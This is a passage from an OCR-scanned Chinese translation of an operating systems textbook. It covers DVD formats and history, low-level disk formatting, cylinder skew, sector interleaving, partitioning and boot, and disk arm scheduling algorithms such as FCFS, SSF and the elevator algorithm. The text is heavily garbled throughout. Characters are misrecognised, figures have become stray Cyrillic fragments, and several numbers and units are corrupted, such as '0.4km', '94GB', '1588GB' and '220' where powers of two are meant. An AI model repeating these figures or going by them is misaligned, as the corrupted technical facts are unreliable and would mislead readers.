进行 备份 的 应 用 程序 来 说 ， 实 际 情况 就 是 一 次 性 写 人 ，CD-R 不 会 被 意外 地 控 除 是 一 大 好 事 。 

6.DVD 

基本 CD/CD-ROM 格 式 自 1980 年 以 来 经 受 了 考验 。 从 那 时 起 ， 技 术 在 不 断 改进 ， 所 以 更 高 容量 的 光 
盘 现 在 在 经 济 上 是 可 行 的 ， 并 且 存在 着 对 它们 的 巨大 需求 。 好 莱 坞 热切 地 希望 用 数字 光盘 来 取代 模拟 录 
像 磁带 ， 因 为 光盘 具有 更 高 的 容量 ， 更 低廉 的 制造 成 本 ， 更 长 的 使 用 时 间 ， 占 用 音像 商店 更 少 的 货架 空 
间 ， 并 且 不 必 倒 带 。 消 费 性 电子 公司 正 期 待 着 一 种 新 型 的 一 鸣 惊 人 的 产品 ， 而 许多 计算 机 公司 则 希望 为 
他 们 的 软件 增添 多 媒体 特性 。 

这 三 个 极其 富有 并 且 势 力 强大 的 产业 在 技术 与 需求 方面 的 结合 引出 了 DVD， 最 初 DVD 是 Digital 
Video Disk (KFARA) 的 首 字母 缩写 ， 但 是 现在 官方 的 名 称 是 Digital Versatile Disk (数字 通用 光盘 ) 。 
DVD 采 用 与 CD 同样 的 总 体 设计 ， 使 用 120 mm 的 注 模 聚 碳酸 酯 盘 片 ， 包 含 四 痕 和 槽 痛 ， 它 们 由 激光 二 极 
管 照明 并 且 由 光电 探测 器 读 取 。 新 特性 包括 使 用 了 : 

D 更 小 的 中 痕 (0.4km，CD 是 0.8hm) 。 

2) 更 密 的 螺旋 (轨迹 间距 0.74km，CD 是 1.6um) 。 

3) 红色 激光 (波长 0.65am，CD 是 0.78hm) 。 

综合 起 来 ， 这 些 改进 将 容量 提高 了 7 倍 ， 达 到 4.7GB。 一 个 1 倍速 的 DVD 驱动 器 以 1.4 MB/s 的 速率 运 
转 (CD 是 150 KB/s)。 但 是 ， 切 换 到 红色 激光 意味 着 DVD 播放 器 需要 第 二 个 激光 器 或 者 价格 高 兄 的 光学 
转换 器 才能 够 读 取现 有 的 CD 和 CD-ROM。 随 着 激光 器 价格 的 下 降 ， 现 在 大 多 数 驱 动 器 都 有 两 种 激光 器 ， 
所 以 它们 能 够 读 取 两 种 类 型 的 介质 。 

是 不 是 4.7GB 就 足够 了 ? 也 许 是 。 采 用 MPEG-2 压 缩 (在 IS 13346 中 标准 化 )， 一 块 4.7GB 的 DVD 盘 能 
够 保存 133 分 钟 高 分 辩 素 (720 x 480) 的 全 屏幕 、 全 运动 视频 ， 以 及 最 多 8 种 语言 的 音 轨 和 最 多 32 种 语言 
的 字 帮 。 好 莱 坞 曾经 制作 的 全 部 电影 中 大 约 92% 在 133 分 钟 以 下 。 然 而 ， 某 些 应 用 (例如 多 媒体 游戏 或 者 
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参考 手册 ) 可 能 需要 更 多 的 空间 ， 并 且 好 莱 坞 希望 将 多 部 电影 放 在 同一 张 盘 上 ， 为 此 定义 了 四 种 格式 : 

1) 单 面 单 层 (4.7GB ) 。 

2) 单 面 双 层 (8.5GB)。 

3) 双 面 单 层 (94GB), 

4) 双 面 双 层 (17ОВ), 

为 什么 要 如 此 多 种 格式 ?一 句 话 : 政治 利益 。 飞 利 浦和 索尼 对 于 高 容量 的 版 本 希望 采用 单 面 双 层 盘 ， 
而 东芝 和 时 代 华 纳 则 希望 采用 双 面 单 层 盘 。 飞 利 浦和 索尼 认为 人 们 不 会 愿意 将 盘 片 翻 面 ， 而 东芝 和 时 代 
华纳 则 不 相信 将 两 层 帮 在 一 面 能 够 工作 。 妥 协 是 支持 全 部 组 合 ， 但 是 市 场 将 决定 哪些 格式 会 生存 下 来 。 

双 层 技术 在 底部 具有 一 个 反射 层 ， 在 上 面 加 上 一 个 半 反 射 层 。 激 光 从 一 层 还 是 从 另 一 层 反射 回来 取 
决 于 激光 在 何 处 汇聚 。 下 面 一 野 需要 稍微 大 一 些 的 凹 痕 和 槽 痛 ， 以 便 可 靠 地 读 出 ， 所 以 其 容量 比 上 面 一 
层 稍微 小 一 些 。 

双 面 盘 是 通过 采用 两 片 0.6 mm 的 单 面 盘 并 且 将 它们 背 对 背地 粘 合 在 一 起 做 成 的 。 为 了 使 所 有 版 本 的 
厚度 相同 ， 单 面 盘 包含 一 个 0.6 mm 的 盘 片 ， 粘 合 在 一 片 空白 的 基底 上 (或 者 也 许 在 将 来 是 粘 合 在 一 个 包 
含 133 分 钟 广告 的 盘 上 ， 期 望 人 们 会 好 奇 其 中 包含 什么 ) 。 双 面 双 层 盘 的 结构 如 图 5-24 所 示 。 


聚 碳酸 酯 基底 1 жийи 
0.6 mm 单 面 盘 


| 
МУУ SN 
лл лла гълта 


0.6 mm 单 面 盘 


聚 碳酸 酯 基底 2 


图 5-24 双 面 双 层 DVD 盘 


DVD 是 由 10 家 消费 性 电子 公司 的 联盟 在 主要 的 好 莱 坞 制 片 厂 的 紧密 协作 下 设计 的 ， 其 中 7 家 是 日 本 
公司 ， 而 其 中 一 些 好 莱 坞 制 片 厂 也 是 由 联盟 中 的 日 本 电子 公司 所 拥有 。 计 算 机 与 电信 产业 未 被 邀请 参加 
这 一 野餐 会 ， 导 致 的 结果 是 注意 力 集中 在 将 DVD 用 于 电影 租赁 与 营业 性 放映 上 。 例 如 ， 标 准 特性 包括 实 
时 跳 过 色情 场景 (使 父母 得 以 将 一 部 等 级 为 NCI78 的 影片 转变 成 对 儿童 安全 的 影片 )， 包 含 六 声 道 声音 ， 
并 且 支 持 摇 报 及 扫描 。 最 后 一 个 特性 是 允许 动态 地 决定 如 何 将 电影 (其 宽 高 比 为 3:2) 的 左 和 右边 缘 修 
剪 掉 以 便 适合 当前 的 电视 机 (其 宽 高 比 为 4:3)。 

另 一 个 计算 机 业 大 概 不 会 考虑 的 项 目 是 在 供应 给 美国 的 光盘 与 供应 给 欧洲 的 光盘 以 及 适用 于 其 他 大 
陆 的 其 他 标准 之 间 故 意 不 兼容 。 因 为 新 影片 总 是 首先 在 美国 发 行 ， 然 后 当 视频 产品 在 美国 上 市 的 时 候 再 
输出 到 欧洲 ， 所 以 好 莱 坞 需要 这 一 “特性 "。 这 一 主意 可 以 确保 欧洲 的 音像 商店 不 能 过 早 地 在 美国 买 到 
视频 产品 ， 减少 新 电影 在 欧洲 的 票房 收入 。 如 果 计算 机 产业 是 由 好 莱 坞 来 运作 的 ， 那 么 就 会 在 
只 能 使 用 3.5 英 寸 的 软盘 而 在 欧洲 只 能 使 用 9 厘米 的 软盘 。 

发 明 单 面 / 双 面 和 单 层 / 双 层 DVD 的 那些 人 再 一 次 陷 人 混战 。 由 于 产业 界 参与 者 政治 上 的 争论 ， 下 一 代 
DVD 仍然 缺乏 单一 的 标准 。 一 种 新 的 设备 是 Blu-ray ( 蔓 光 光盘 )， 它 使 用 0.405(m ( 蓝 色 ) 激光 将 25 GBE 
入 单 层 盘 中 ， 或 者 将 50GB 压 人 双 层 盘 中 。 另 一 种 设备 是 HD DVDS ， 它 使 用 相同 的 蓝 色 激光 ， 但 是 容量 
只 有 15 GB (йа) 或 者 30 GB ( 双 层 )。 这 种 格式 之 战 将 电影 制 片 厂 、 计 算 机 制造 商 和 软件 公司 割裂 开 来 。 
缺乏 标准 的 结果 是 ， 这 一 代 DVD 推 广 得 非常 慢 ， 因 为 消费 者 在 等 待 着 尘埃 落 定 ， 看 哪 一 个 格式 胜出 。 产 
业界 这 些 矶 各 的 行为 让 人 想起 George Santayana@ 的 名 言 :“ 不 能 以 史 为 鉴 的 人 注定 要 重 蹈 预 狼 ”。 


Ө NCI17 代 表 No Children Under 17 Admitted， 即 17 岁 以 下 儿童 不 得 观看 。 一 一 译 者 注 
Ө HD 代 表 High Density (高 密度 ) 。 一 一 译 者 注 
© George Santayana (乔治 - 桑 塔 亚 纳 ，1863 一 1952) 美国 著名 哲学 家 、 美 学 家 。 一 一 译 者 注 
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5.42 磁盘 格式 化 

硬盘 由 一 又 铝 的 、 合金 的 或 玻璃 的 盘 片 组 成 ,直径 为 5.25 英 寸 或 3.5 英 寸 (在 笔记 本 电脑 上 甚至 更 小 )。 
在 每 个 盘 片上 沉积 着 薄 萍 的 可 磁化 的 金属 氧化 物 。 在 制造 出 来 之 后 ， 磁 盘 上 不 存在 任何 信息 。 

在 磁盘 能 够 使 用 之 前 ， 每 个 盘 片 必须 经 受 由 软件 完成 的 低级 格式 化 (low-level format)。 该 格式 包含 
一 系列 同心 的 栈道 ， 每 个 破 道 包含 若干 数目 的 扇 区 ， 遍 区 间 存在 短 的 间 阶 。 一 个 扇 区 的 格式 如 图 5-25 所 示 。 

前 导 码 以 一 定 的 位 模式 开始 ， 位 模式 使 
硬件 得 以 识别 遍 区 的 开始 。 前 导 码 还 包含 柱 | 前 导 码 == 
УИ ААВ. BRR 图 5-25 —_ “вА 
大 小 是 由 低级 格式 化 程序 决定 的 ， 大 多 数 磁 
盘 使 用 512 字 节 的 扇 区 。ECC 域 包含 宛 余 信 
息 ， 可 以 用 来 恢复 读 错误 。 该 域 的 大 小 和 内 
容 随 生产 商 的 不 同 而 不 同 ， 它 取决 于 设计 者 
为 了 更 高 的 可 靠 性 愿意 放弃 多 少 磁盘 空间 以 
及 控制 器 能 够 处 理 的 ECC 编 码 有 多 复杂 。16 
字 节 的 ECC 域 并 不 是 罕见 的 。 此 外 ， 所 有 硬 
盘 都 分 配 有 某 些 数目 的 备用 扇 区 ， 用 来 取代 
ЯГНЯ Ноа, 

在 设置 低级 格式 时 ， 每 个 磁道 上 第 0 遍 
区 的 位 置 与 前 一 个 磁道 存在 偏 移 。 这 一 偏 移 
FRA BSH (cylinder skew) ， 这 样 做 是 为 
了 改进 性 能 ， 想 法 是 让 磁盘 在 一 次 连续 的 操 
作 中 读 取 多 个 磁道 而 不 丢失 数据 。 观 察 图 5- 
19a 就 可 以 明白 问题 的 本 质 。 假 设 一 个 读 请 
求 需 要 最 内 侧 磁 道上 从 第 0 扁 区 开始 的 18 个 
遍 区 ， 磁 盘旋 转 一 周 可 以 读 取 前 16 个 扇 区 ， 
但 是 为 了 得 到 第 17 个 扁 区 ， 则 需要 一 次 寻 首 图 5.26 桂 面 斜 进 示意 图 
操作 以 便 磁头 向 外 移动 一 个 磁道 。 到 磁头 移 
动 了 一 个 磁道 时 ， 第 0 扇 区 已 经 转 过 了 磁头 ， 所 以 需要 旋转 一 整 周 才能 等 到 它 再 次 经 过 磁头 。 通 过 图 
5-26 所 示 的 将 扁 区 偏 移 即 可 消除 这 一 问题 。 

柱 面 斜 进 量 取决 于 驱动 器 的 几何 规格 。 例 如 ， 一 个 10 000rpm 的 驱动 器 每 6ms 旋 转 一 周 ， 如 果 一 个 
玻 道 包含 300 个 扇 区 ， 那 么 每 20ks 就 有 一 个 新 遍 区 在 磁头 下 通过 。 如 果 玻 道 到 磁道 的 寻 道 时 间 是 800us， 
那么 在 寻 道 期 间 将 有 40 个 扁 区 通过 ， 所 以 柱 面 斜 进 应 该 是 40 个 扁 区 而 不 是 图 5-26 中 的 三 个 扇 区。 值得 一 
提 的 是 ， 像 柱 面 斜 进 一 样 也 存在 着 破 头 针 进 (head skew) ， 但 是 磁头 斜 进 不 是 非常 大 。 

低级 格式 化 的 结果 是 磁盘 容量 减少 ， 减 少 的 量 取决 于 前 导 码 、 遍 区 间 间 队 和 ECC 的 大 小 以 及 保留 的 
备用 肩 区 的 数目 。 通 常 格式 化 的 容量 比 未 格式 化 的 容量 低 20% 。 备 用 扁 区 不 计 入 格式 化 的 容量 ， 所 以 一 
种 给 定 类 型 的 所 有 磁盘 在 出 厂 时 具有 完全 相同 的 容量 ， 与 它们 实际 具有 多 少 坏 岛 区 无 关 (如果 坏 扁 区 的 
数目 超出 了 备用 扇 区 的 数目 ， 则 该 驱动 器 是 不 合格 的 ， 不 会 出 厂 ) 。 

关于 磁盘 容量 存在 着 相当 大 的 混淆 ， 这 是 因为 革 些 制造 商 广告 宣传 的 是 未 格式 化 的 容量 ， 从 而 使 他 
们 的 驱动 器 看 起 来 比 实际 的 容量 要 大 。 例 如 ， 考 虑 一 个 未 格式 化 容量 为 200 x 10* 字 节 的 驱动 器 ， 它 或 放 
是 作为 200GB 的 磁盘 销售 的 。 然 而 ， 格 式 化 之 后 ， 也 许 只 有 170 x 10" 字 节 可 用 于 存放 数据 。 使 这 一 混 清 
进一步 加 剧 的 是 操作 系统 可 能 将 这 一 容量 报告 为 1588GB， 而 不 是 170GB， 因 为 软件 把 1GB 看 作 是 220 
(1073741 824) 字 节 ， 而 不 是 10” (1 000 000 000) 字 节 。 

在 数据 通信 世界 里 ，1Gbps 意 味 着 1 000 000 000 位 / 秒 ， 因 为 前 级 G ( 吉 ) 确实 表示 10”( 毕 竞 一 千 米 
是 1000 米 ， 而 不 是 1024 米 ) ， 所 以 使 事情 更 加 精 料 。 只 有 在 关于 内 存 和 磁盘 的 大 小 的 情况 下 ，kilo( 千 )、 
mega (JE), giga (1) 和 tera (Ж) 才 分 别 表示 2*、2”、2* 和 2%。 
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格式 化 还 对 性 能 产生 影响 。 如 果 一 个 10 000RPM 的 磁盘 每 个 磁道 有 300 个 扇 区 ， 每 个 扁 区 512 字 节 ， 
那么 用 6ms 可 以 读 出 一 个 磁道 上 的 153 600 字 节 ， 使 数据 率 为 25 600 000 字 节 / 秒 或 24.4 MB/s。 不 论 引 入 
什么 种 类 的 接口 ， 都 不 可 能 比 这 个 速度 更 快 ， 即 便 是 80 MB/s 或 160 MB/s 的 SCSI 接 口 也 不 行 。 

实际 上 ， 以 这 一 速率 连续 地 读 磁盘 要 求 控制 器 中 有 一 个 大 容量 的 缓冲 区 。 例 如 ， 考 虑 一 个 控制 器 ， 
它 具 有 一 个 扇 区 的 缓冲 区 ， 该 控制 器 接 到 一 条 命令 要 读 两 个 连续 的 扇 区 。 当 从 磁盘 上 读 出 第 一 个 遍 区 并 
做 了 ECC 计 算 之 后 ， 数 据 必须 传送 到 主 存 中 。 就 在 传送 正在 进行 时 ， 下 一 个 扁 区 将 从 磁头 下 通过 。 当 完 
成 了 向 主 存 的 复制 时 ， 控 制 器 将 不 得 不 等 待 几乎 一 整 周 的 旋转 时 间 才 能 等 到 第 二 个 扁 区 再 次 回来 。 

通过 在 格式 化 磁盘 时 以 交错 方式 对 扇 区 进行 编号 可 以 消除 这 一 问题 。 在 图 5-27a 中 ， 我 们 看 到 的 是 
通常 的 编号 模式 (此 处 忽略 柱 面 斜 进 )。 在 图 5-27b 中 ， 我 们 看 到 的 是 单 交错 (single interleaving)， 它 可 
以 在 连续 的 扇 区 之 间 给 控制 器 以 喘息 的 空间 以 便 将 缓冲 区 复制 到 主 存 。 


С 
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b) c) 
图 5-27 а) 无 交错 ，b) 单 交错 ，c) 双 交 错 


如 果 复 制 过 程 非常 慢 ， 可 能 需要 如 图 5-27c 中 的 双 交 错 (double interleaving)。 如 果 控制 器 拥有 的 组 
冲 区 只 有 一 个 扇 区， 那么 从 缓冲 区 到 主 存 的 复制 无 论 是 由 控制 器 完成 还 是 由 主 CPU 或 着 DMA 芯 片 完成 
都 无 关 紧要 ， 都 要 花费 某 些 时 间 。 为 了 避免 需要 交错 ， 控 制 器 应 该 能 够 对 整个 磁道 进行 缓存 ， 许 多 现代 
控制 器 都 能 够 这 样 做 。 

在 低级 格式 化 完成 之 后 ， 要 对 磁盘 进行 分 区 。 在 逻辑 上 ， 每 个 分 区 就 像 是 一 个 独立 的 磁盘 。 分 区 对 
于 多 个 操作 系统 共存 是 必需 的 。 此 外 ， 在 某 些 情况 下 ， 分 区 可 以 用 来 进行 交换 。 在 Pentium 和 大 多 数 其 
他 计算 机 上 ，0 扇 区 包含 主 引导 记录 (master boot record) ， 它 包含 某 些 引导 代码 和 未 尾 的 分 区 表 。 分 区 
表 给 出 了 每 个 分 区 的 起 始 扇 区 和 大 小 。 在 Pentium 上 ， 分 区 表 具 有 四 个 分 区 的 空间 。 如 果 这 四 个 分 区 都 
用 于 Windows， 那 么 它们 将 被 称 为 C:、D:、E: 和 F: ， 并 且 作 为 单独 的 驱动 器 对 待 。 如 果 它 们 中 有 三 个 
用 于 Windows 一 个 用 于 UNIX, 那么 Windows 会 将 它 的 分 区 称 为 C;:、D: 和 E:, 然后 第 一 个 CD-ROM 是 F; 。 
为 了 能 够 从 硬盘 引导 ， 在 分 区 表 中 必须 有 一 个 分 区 被 标记 为 活动 的 。 

在 准备 一 块 磁盘 以 便于 使 用 的 最 后 一 步 是 对 每 一 个 分 区 分 别 执行 一 次 高 级 格式 化 (high-level 
format)。 这 一 操作 要 设置 一 个 引导 块 、 空 闲 存储 管理 (空闲 列表 或 位 图 ) 、 根 目录 和 -个 空 文件 系统 。 
这 一 操作 还 要 将 一 个 代码 设置 在 分 区 表 项 中 ， 以 表明 在 分 区 中 使 用 的 是 哪个 文件 系统 ， 因 为 许多 操作 系 
统 支持 多 个 兼容 的 文件 系统 (由 于 历史 原因 ) 。 这 时 ， 系 统 就 可 以 引导 了 。 

当 电源 打开 时 ，BIOS 最 先 运行 ， 它 读 入 主 引导 记录 并 跳 转 到 主 引导 记录 。 然 后 这 一 -引导 程序 进行 
检查 以 了 解 哪个 分 区 是 活动 的 。 引导 扁 区 包含 一 个 小 的 程序 ， 它 一 般 会 装 和 一 个 较 大 的 引导 程序 装载 器 ， 
该 引导 程序 装载 器 将 搜索 文件 系统 以 找到 操作 系统 内 核 。 访 程序 被 装 入 内 存 并 执行 。 


5.4.3 磁盘 展 调 度 算法 

本 小 节 我 们 将 一 般 地 讨论 与 磁盘 驱动 程序 有 关 的 几 个 问题 。 首 先 ， 考 虑 读 或 者 写 一 个 磁盘 块 需要 多 
长 时 间 。 这 个 时 间 由 以 下 三 个 因素 决定 : 

D 寻 道 时 间 (将 磁盘 臂 移动 到 适当 的 柱 面 上 所 需 的 时 间 )。 

D 旋转 延迟 (等 待 适当 扁 区 旋转 到 磁头 下 所 需 的 时 间 )。 

3) 实际 数据 传输 时 间 。 

对 大 多 数 磁盘 而 言 ， 寻 道 时 间 与 另外 两 个 时 间 相 比 占 主导 地 位 ， 所 以 减少 平均 寻 道 时 间 可 以 充分 地 
改善 系统 性 能 。 

如 果 磁盘 驱动 程序 每 次 接收 一 个 请 求 并 按照 接收 顺序 完成 请 求 ， 即 先 来 先 服务 (First-Come, First- 
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Served，FCFS)， 则 很 难 优化 录 道 时 间 。 然 而 ， 当 磁盘 负载 很 重 时 ， 可 以 采用 其 他 策略 。 很 有 可 能 当 磁 
盘 臂 为 一 个 请 求 寻 道 时 ， 其 他 进程 会 产生 其 他 磁盘 请 求 。 许 多 磁盘 驱动 程序 都 维护 着 一 张 表 ， 该 表 按 柱 
面 号 索引 ， 每 一 柱 面 的 未 完成 的 请 求 组 成 一 个 链表 ， 链 表 头 存放 在 表 的 相应 表 目 中 。 

给 定 这 种 数据 结构 ， 我 们 可 以 改进 先 来 先 服务 调度 算法 。 为 了 说 明 如 何 实现 ， 考 虑 一 个 具有 40 个 柱 
面 的 假想 的 磁盘 。 假 设 读 柱 面 1 上 一 个 数据 块 的 请 求 到 达 ， 当 对 柱 面 11 的 寻 道 正在 进行 时 ， 又 按 顺 序 到 
达 了 对 柱 面 !、36、16、34、9 和 12 的 请 求 ， 则 让 它们 进入 未 完成 的 请 求 表 ， 每 一 个 柱 面 对 应 一 个 单独 的 
链表 。 图 5-28 显 示 了 这 些 请 求 。 


初始 位 置 ”未 完成 的 请 求 


ш 
| 寻 道 顺序 


图 5-28 最 短 寻 道 优先 (SSF) 磁盘 调度 算法 


当前 请 求 ( 请 求 柱 面 11) 结束 后 ， 磁 盘 驱 动 程序 要 选择 下 一 次 处 理 哪 一 个 请 求 。 若 使 用 FCFS 算 法 ， 
则 首先 选择 柱 面 1， 然 后 是 36， 以 此 类 推 。 这 个 算法 要 求 磁盘 帝 分 别 移动 10、35、20、18、25 和 3 个 柱 面 ， 
总 共 需 要 移动 111 个 柱 面 。 

另 一 种 方法 是 下 一 次 总 是 处 理 与 磁头 距离 最 近 的 请 求 以 使 寻 道 时 间 最 小 化 。 对 于 图 5-28 中 给 出 的 请 
求 ， 选 择 请 求 的 顺序 如 图 5-28 中 下 方 的 折线 所 示 ， 依 次 为 12、9、16、1、34 和 36。 按 照 这 个 顺序 ， 磁 盘 
臂 分别 需要 移动 1、3、7、15、33 和 2 个 柱 面 ， 总 共 需 要 移动 61 个 柱 面 。 这 个 算法 即 最 姑 时 道 优先 
(Shortest Seek First，SSF) ， 与 FCFS 算 法 相 比 ， 该 算法 的 磁盘 臂 移 动 几乎 减少 了 一 半 。 

但 是 ，SSF 算 法 存在 一 个 问题 。 假 设 当 图 5-28 所 示 的 请 求 正在 处 理 时 ， 不 断 地 有 其 他 请 求 到 达 。 例 
和 如， 磁盘 各 移 到 柱 面 16 以 后 ， 到 达 一 个 对 柱 面 8 的 新 请 求 ， 那 么 它 的 优先 级 将 比 柱 面 1 要 高 。 如 果 接 着 又 
到 达 了 一 个 对 柱 面 13 的 请 求 ， 磁 盘 臂 将 移 到 柱 面 13 而 不 是 柱 面 1。 如 果 磁 盘 负 载 很 重 ， 那 么 大 部 分 时 间 
破 盘 辟 将 停留 在 磁盘 的 中 部 区 域 ， 而 两 端 极 端 区 域 的 请 求 将 不 得 不 等 待 ， 直 到 负载 中 的 统计 波动 使 得 中 
部 区 域 没有 请 求 为 止 。 远 离 中 部 区 域 的 请 求 得 到 的 服务 很 差 。 因 此 获得 最 小 响应 时 间 的 目标 和 公平 性 之 
间 存在 着 冲突 。 

高 层 建筑 也 要 进行 这 种 权衡 处 理 ， 高 层 建筑 中 的 电梯 调度 问题 和 磁盘 臂 调度 很 相似 。 电梯 请 求 不 断 
地 到 来 ， 随 机 地 要 求 电梯 到 各 个 楼 层 〈 柱 面 )。 控 制 电梯 的 计算 机 能 够 很 容易 地 跟踪 顾客 按 下 请 求 按钮 
的 顺序 ， 并 使 用 FCFS 或 者 SSF 为 他 们 提供 服务 。 

然而 ， 大 多 数 电 梯 使 用 一 种 不 同 的 算 靶 来 协调 效率 和 公平 性 这 两 个 相互 冲突 的 目标 。 电 梯 保持 按 一 
个 方向 移动 ， 直 到 在 那个 方向 上 没有 请 求 为 止 ， 然 后 改变 方向 。 这 个 算法 在 磁盘 世界 和 电梯 世界 都 被 称 
为 电梯 算法 (elevator algorithm) ， 它 需要 软件 维护 一 个 二 进 制 位 ， 即 当前 方向 位 ，UP (向 上 ) 或 是 
DOWN (向 下 )。 当 一 个 请 求 处 理 完 之 后 ， 磁 盘 或 电梯 的 驱动 程序 检查 该 位 ， 如 果 是 UP， 磁 盘 辟 或 电梯 
舱 移 至 下 一 个 更 高 的 未 完成 的 请 求 。 如 果 更 高 的 位 置 没有 未 完成 的 请 求 ， 则 方向 位 取 反 。 当 方 向 位 设置 
为 DOWN 时 ， 同 时 存在 一 个 低位 置 的 请 求 ， 则 移 向 该 位 置 。 

图 5-29 显 示 了 使 用 与 图 5-28 相 同 的 7 个 请 求 的 电梯 算法 的 情况 。 假 设 方向 位 初始 为 UP， 则 各 柱 面 获 
得 服务 的 顺序 是 12、16、34、36、9 和 1， 磁 盘 句 分 别 移动 1、4、18、2、27 和 8 个 柱 面 ， 总 共 移动 60 个 柱 
面 。 在 本 例 中 ， 电 梯 算法 比 SSF 还 要 稍微 好 一 点 ， 尽 管 通常 它 不 如 SSF。 电梯 算法 的 一 个 优良 特性 是 对 
任意 的 一 组 给 定 请 求 ， 磁 盘 彤 移动 总 次 数 的 上 界 是 固定 的 :正好 是 柱 面 数 的 两 倍 。 

对 这 个 算法 稍 加 改进 可 以 在 响应 时 间 上 具有 更 小 的 变异 (Teory，1972)， 方法 是 总 是 按 相同 的 方向 
进行 扫描 。 当 处 理 完 最 高 编号 柱 面 上 未 完成 的 请 求 之 后 ， 磁盘 臂 移动 到 具有 未 完成 的 请 求 的 最 低 编号 的 
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柱 面 ， 然 后 继续 沿 向 上 的 方向 移动 。 实 际 上 ， 这 相当 于 将 最 低 编号 的 柱 面 看 作 是 最 高 编号 的 柱 面 之 上 的 
相 邻 柱 面 。 


初始 位 置 


一 时 间 
ш 
@ 
ж 
ЕУ 


15-29 调度 磁盘 请 求 的 电梯 算法 


某 些 磁盘 控制 器 提供 了 一 种 方法 供 软件 检查 磁头 下 方 的 当前 扇 区 号 。 对 于 这 种 磁盘 控制 器 ， 还 可 以 
进行 另 一 种 优化 。 如 果 针 对 同一 柱 面 有 两 个 或 多 个 请 求 正 等 待 处 理 ， 驱 动 程序 可 以 发 出 请 求 读 写 下 一 次 
要 通过 磁头 的 扁 区 。 注 意 ， 当 一 个 柱 面 有 多 条 磁道 时 ， 相 继 的 请 求 可 能 针对 不 同 的 磁道 ， 故 没有 任何 代 
价 。 因 为 选择 磁头 既 不 需要 移动 磁盘 壬 也 没有 旋转 延迟 ， 所 以 控制 器 几乎 可 以 立即 选择 任意 磁头 。 

如 果 磁盘 具有 寻 道 时 间 比 旋转 延迟 快 很 多 的 特性 ， 那 么 应 该 使 用 不 同 的 优化 策略 。 未 完成 的 请 求 应 
该 按 扁 区 号 排序 ， 并 且 当 下 一 个 扁 区 就 要 通过 磁头 的 时 候 ， 磁 盘 筑 应 该 飞快 地 移动 到 正确 的 磁道 上 对 其 
进行 读 或 者 写 。 

对 于 现代 硬盘 ， 寻 道 和 旋转 延迟 是 如 此 影响 性 能 ， 所 以 一 次 只 读 取 一 个 或 两 个 扁 区 的 效率 是 非常 低 
下 的 。 由 于 这 个 原因 ， 许 多 磁盘 控制 器 总 是 读 出 多 个 扇 区 并 对 其 进行 高 速 缓存 ， 即 使 只 请 求 一 个 扇 区 时 
也 是 如 此 。 典 型 地 ， 读 一 个 扇 区 的 任何 请 求 将 导致 该 扁 区 和 当前 磁道 的 多 个 或 者 所 有 剩余 的 扇 区 被 读 出 
读 出 的 扇 区 数 取决 于 控制 器 的 高 速 缓存 中 有 多 少 可 用 的 空间 。 例 如 ， 在 图 5-18 所 描述 的 磁盘 中 有 4MB 的 
高 速 缓 在。 高 速 缓存 的 使 用 是 由 控制 器 动态 地 决定 的 。 在 最 简单 的 模式 下 ， 高 速 缓存 被 分 成 两 个 区 段 
一 个 用 于 读 ， 一 个 用 于 写 。 如 果 后 来 的 读 操作 可 以 用 控制 器 的 高 速 缓存 来 满足 ， 那 么 就 可 以 立即 返回 被 
请 求 的 数据 。 

值得 注意 的 是 ， 磁 盘 控 制 器 的 高 速 缓存 完全 独立 于 操作 系统 的 高 速 缓 在。 控制 器 的 高 速 缓存 通常 保 
存 还 没有 实际 被 请 求 的 块 ， 但 是 这 对 于 读 操作 是 很 便利 的 ， 因 为 它们 只 是 作为 某 些 其 他 读 操作 的 附带 效 
应 而 恰巧 要 在 磁头 下 通过 。 与 之 相反 ， 操 作 系统 所 维护 的 任何 高 速 缓存 由 显 式 地 读 出 的 块 组 成 ， 并 且 操 
作 系统 认为 它们 在 较 近 的 将 来 可 能 再 次 需要 (例如 ， 保 存 目录 块 的 一 个 磁盘 块 ) 。 

当 同一 个 控制 器 上 有 多 个 驱动 器 时 , 操作 系统 应 该 为 每 个 驱动 器 都 单独 地 维护 一 个 未 完成 的 请 求 表 。 
一 旦 任何 一 个 驱动 器 空闲 下 来 ， 就 应 该 发 出 一 个 寻 道 请 求 将 磁盘 臂 移 到 下 一 个 将 被 请 求 的 柱 面 处 〈 假 设 
控制 器 公 许 重 状 寻 道 )。 当 前 传输 结束 时 ， 将 检查 是 否 有 驱动 器 的 磁盘 辟 位 于 正确 的 柱 面 上 。 如 果 存在 
一 个 或 多 个 这 样 的 驱动 器 ， 则 在 磁盘 项 已 经 位 于 正确 柱 面 处 的 驱动 器 上 开始 下 一 次 传输 。 如 果 没 有 驱动 
器 的 磁盘 息 处 于 正确 的 位 置 ， 则 驱动 程序 在 刚刚 完成 传输 的 驱动 器 上 发 出 一 个 新 的 寻 道 命令 并 且 等 待 
直到 下 一 次 中 断 到 来 时 检查 哪 一 个 磁盘 名 首先 到 达 了 目标 位 置 。 

士 面 所 有 的 磁盘 调度 算法 都 是 默认 地 假设 实际 磁盘 的 几何 规格 与 虚拟 几何 规格 相同 ， 认 识 到 这 一 点 
十 分 重要 。 如 果 不 是 这 样 ， 那 么 调度 磁盘 请 求 就 毫 无 意义 ， 因 为 操作 系统 实际 上 不 能 断定 柱 面 40 与 柱 面 
200 哪 一 个 与 柱 面 39 更 接近 。 另 一 方面 ， 如 果 磁盘 控制 器 能 够 接收 多 个 未 完成 的 请 求 ， 它 就 可 以 在 内 部 
使 用 这 些 调度 算法 。 在 这 样 的 情况 下 ， 算 法 仍然 是 有 效 的 ， 但 是 低 了 一 个 层次 ， 局 限 在 控制 器 内 部 。 


5.4.4 错误 处 理 

磁盘 制造 商 通过 不 断 地 加 大 线性 位 密度 而 持续 地 推进 技术 的 极限 。 在 一 块 5.25 英 寸 的 磁盘 上 ， 处 于 
中 间 位 置 的 一 个 磁道 大 约 有 300mm 的 周 长 。 如 果 该 磁道 存放 300 个 512 字 节 的 扇 区 ， 考 虑 到 由 于 前 导 三 
ECC 和 肩 区 间隙 而 损失 了 部 分 空间 这 样 的 实际 情况 ， 线 性 记录 密度 大 约 是 5000b/mm。 记 录 5000bmm 需 
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要 极其 均匀 的 基 片 和 非常 精细 的 氧化 物 涂 层 。 但 是 ， 按 照 这 样 的 规范 制造 磁盘 而 没有 瑕 症 是 不 可 能 的 。 
一 且 制 造 技术 改进 到 一 种 程度 ， 即 在 那样 的 密度 下 能 够 无 甫 症 地 操作 ， 磁 盘 设计 者 就 会 转 到 更 高 的 密度 
以 增加 容量 。 这 样 做 可 能 会 再 次 引入 瑕 症 。 

